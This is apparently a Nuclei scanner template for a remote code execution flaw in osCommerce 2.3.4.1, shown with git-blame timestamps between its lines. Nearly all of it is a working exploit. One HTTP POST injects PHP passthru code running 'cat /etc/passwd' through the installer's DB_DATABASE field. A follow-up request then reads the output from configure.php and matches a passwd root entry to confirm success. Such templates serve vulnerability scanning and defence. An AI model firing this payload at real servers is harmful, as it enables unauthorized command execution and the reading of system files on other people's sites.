2021-07-15 12:59:24 +00:00
id : oscommerce-rce
2021-07-15 12:41:26 +00:00
info :
name : osCommerce 2.3.4.1 - Remote Code Execution
2022-04-22 10:38:41 +00:00
author : Suman_Kar
2021-07-15 12:41:26 +00:00
severity : high
2022-10-10 19:22:59 +00:00
description : osCommerce 2.3.4.1 is susceptible to remote code execution via install.php. A remote attacker can inject PHP code into the db_database parameter and subsequently use the configure.php page to to read the command's executed output.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/50128
2022-10-10 19:22:59 +00:00
- https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
2022-08-27 04:41:18 +00:00
tags : rce,oscommerce,edb
2021-07-15 12:41:26 +00:00
requests :
- raw :
- |
2021-07-15 12:58:08 +00:00
POST /install/install.php?step=4 HTTP/1.1
2021-07-15 12:41:26 +00:00
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
- |
2021-07-15 12:58:08 +00:00
GET /install/includes/configure.php HTTP/1.1
2021-07-15 12:41:26 +00:00
Host : {{Hostname}}
Accept : */*
matchers-condition : and
matchers :
2021-07-15 12:58:08 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-15 12:58:08 +00:00
part : body
2021-07-15 12:41:26 +00:00
- type : status
status :
2022-10-10 19:22:59 +00:00
- 200
# Enhanced by md on 2022/10/04